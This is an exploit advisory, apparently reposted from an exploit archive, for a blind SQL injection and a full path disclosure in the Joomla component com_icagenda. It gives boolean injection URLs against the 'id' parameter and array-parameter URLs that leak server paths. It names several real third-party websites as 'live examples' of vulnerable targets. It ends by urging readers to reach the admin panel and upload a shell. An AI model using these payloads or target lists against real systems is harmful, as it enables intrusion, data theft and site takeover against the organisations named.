Bot24.com

Joomla Component (com_icagenda) Blind SQLi/Path Disclosure Vulnerability

2012-08-31

# Exploit Title: Joomla Component (com_icagenda) Blind SQLi/Path Disclosure .
# Date: 31 August 2012
# Author: Dark-Puzzle (Souhail Hammou)
# Risk : Critical
# Version: All Versions
# Google Dork : N/A
# Category: Webapps/0day
# Tested on: Windows Xp Sp2 Fr .
# Gr337ings to : Inj3ct0r Team - Packetstormsecurity.org - Securityfocus.com - Jigsaw - Dark-Soldier ...
***************************************************************************************
Info :

Icagenda is a New Component for Event Management with a calendar module.
----------------------------------------------------
I - Blind SQL Injection Vulnerability
----------------------------------------------------

Vulnerability :

"id" parameter in com_icagenda is prone to a Blind SQL Vulnerability . An attacker can retrieve & steal data by sending series of True and False Queries through SQL statements .
Here the invisible content shows us that the target suffers from BSQLi .

Example :

www.hackme.com/index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=1 (True)
www.hackme.com/index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=2 (False)

Live Example :

http://www.leadinspiretransform.org/index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=1 (True) Content is displayed
http://www.leadinspiretransform.org/index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=2 (False)

Other Live Examples :

http://www.brie-danse.org/index.php?option=com_icagenda&view=list&layout=event&Itemid=133&id=3 and 1=2 (False) --> Blind Injection .
http://www.cocdklive.com/index.php?option=com_icagenda&view=list&layout=event&Itemid=107&id=1 and 1=2 (False) --> Blind Injection

ADMIN PANEL : http://target/administrator
Then you can upload your shell & enjoy the rest .

-----------------------------------------------------
II - Full Path Disclosure Vulnerability
-----------------------------------------------------
The Full path can be retrieved using Array method [] in ItemID & id Parameters .

Live Examples :
http://www.cocdklive.com/index.php?option=com_icagenda&view=list&layout=event&Itemid[]=107&id=1
http://www.leadinspiretransform.org/index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id[]=1

# Datasec Team

//The information contained within this publication is

//supplied "as-is"with no warranties or guarantees of fitness

//of use or otherwise.Bot24, Inc nor Bradley Sean Susser accepts

//responsibility for any damage caused by the use or misuse of

//this information